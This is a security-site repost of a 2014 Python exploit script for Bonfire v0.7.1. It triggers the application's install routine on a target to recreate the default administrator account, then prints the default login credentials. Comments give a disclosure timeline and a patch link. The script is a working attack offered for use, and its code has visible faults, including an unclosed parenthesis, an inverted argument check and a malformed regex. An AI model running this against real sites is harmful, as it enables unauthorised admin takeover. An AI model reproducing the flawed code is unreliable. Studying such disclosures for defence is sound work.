首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Bonefire v.0.7.1 - Reinstall Admin Account Exploit
来源:admin@mybonefire.com 作者:Mehmet 发布时间:2014-04-25  
#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Mehmet INCE
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
#
# Description : 
# Forgotten controls lead to call install module which lead to
# create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 –Vulnerability found
# 23 Apr 2014 21:20 – Analysis and write-up completed
# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 – Response from lead developer
# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
  
import urllib2
import sys
import re
target = sys.argv[1]
path = sys.argv[2]
  
if len(sys.argv) > 3:
     print "Usage : python bonfire www.target.com /path/"
     exit(0
  
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
  
if re.search('[admin@mybonefire.com]', content):
     print "Target is vulnerable!"
     print "Username : admin@mybonefire.com"
     print "Password : password"
else:
     print "Target is not vulnerable..."

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·No-CMS 0.6.6 rev 1 - Admin Acc
·Acunetix 8 build 20120704 - Re
·Media Player Classic 1.3.1752.
·Acunetix 8 Scanner Buffer Over
·ATSEngine credential disclosur
·mRemote Offline Password Decry
·Adobe Flash Player Regular Exp
·JRuby Sandbox 0.2.2 Bypass
·Linux group_info refcounter -
·cFos Personal Net 3.09 Heap Co
·Sercomm TCP/32674 Backdoor Rea
·Kolibri 2.0 GET Request - Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved